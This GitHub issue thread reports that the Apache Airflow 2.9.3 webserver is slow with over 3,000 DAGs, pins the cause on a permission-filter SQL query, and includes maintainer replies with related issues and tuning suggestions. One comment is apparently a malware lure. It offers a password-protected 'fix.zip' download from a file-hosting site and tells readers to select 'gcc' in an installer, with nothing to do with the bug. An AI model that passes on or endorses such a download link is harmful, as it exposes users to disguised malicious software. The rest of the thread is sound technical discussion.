### ISSUE TITLE
Webserver is slow after upgrading to v2.9.3

### ISSUE THREAD

**Issue by TreasureMaster** [apache/airflow#41851]
### Apache Airflow version

2.9.3

### What happened?

We have updated the version from 2.6.2 to 2.9.3. After the update the main page opens very slowly. The 'failed' button causes Airflow to fail due to a timeout. 
[Start the discussion here](https://github.com/apache/airflow/discussions/41113)

### What you think should happen instead?

We have 3200 Dags now. And their number is increasing. 
The slowdown is caused by line 855 in the file `/airflow/www/views.py`:
```python
status_count_failed = get_query_count(failed_dags, session=session)
```
But not all of it, but only that part of it that filters dags by access rights. We commented out line 799 to prevent filtering by IN. This row:
```python
dags_query = dags_query.where(DagModel.dag_id.in_(filter_dag_ids))
```
This filter condition is not optimal when querying and is very slow. The slow part is highlighted in the query
![airflow-failed-sql](https://github.com/user-attachments/assets/7adf5f8d-ebd8-4c04-a7b6-8765dc94e206)

It is converted from this line:
```sql
WHERE NOT dag.is_subdag AND dag.is_active AND dag.dag_id IN (__[POSTCOMPILE_dag_id_1])
```
The entire request takes between 60 and 70 seconds on our main page. But without this filtering part, the request takes just over 1 second.
My dbeaver hangs during DB query due to lack of memory.

Is it possible to optimize this query? Or split it into parts and filter by permissions it using Python.

### How to reproduce

You need to have a large number of dags and dagruns.

### Operating System

CentOS 7

### Deployment

Docker-Compose

### Deployment details

Our infrastructure:
1) database server (Postgres 13)
2) server with Airflow webserver, scheduler and Redis
3) three servers with workers

Modified bitnami images are used. Additional libraries installed.

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tirkarthi** [comment]
Related 

https://github.com/apache/airflow/issues/38776
https://github.com/apache/airflow/issues/40547

**Comment by jscheffl** [comment]
I would assume a setup with 3000+ DAGs is nothing that is running w/o special attention in regards of performance. Re-writing the queries of course is possible but also the complexity of data selection might be expensive.

Plans are ongoing to re-write the UI and also make async calls in a future Airflow 3, I would not expect a major investment in current Airflow 2.10-line.

Some options that might help compensating - as you are already in level of patching code:

- Have you attempted to analyze the query and add more resources to the DB to improve queries or add specific indexes?
- Do you use DAG level permissions? If not, as you are patching the code, removing the DAG access level filter might be a simple option to improve query
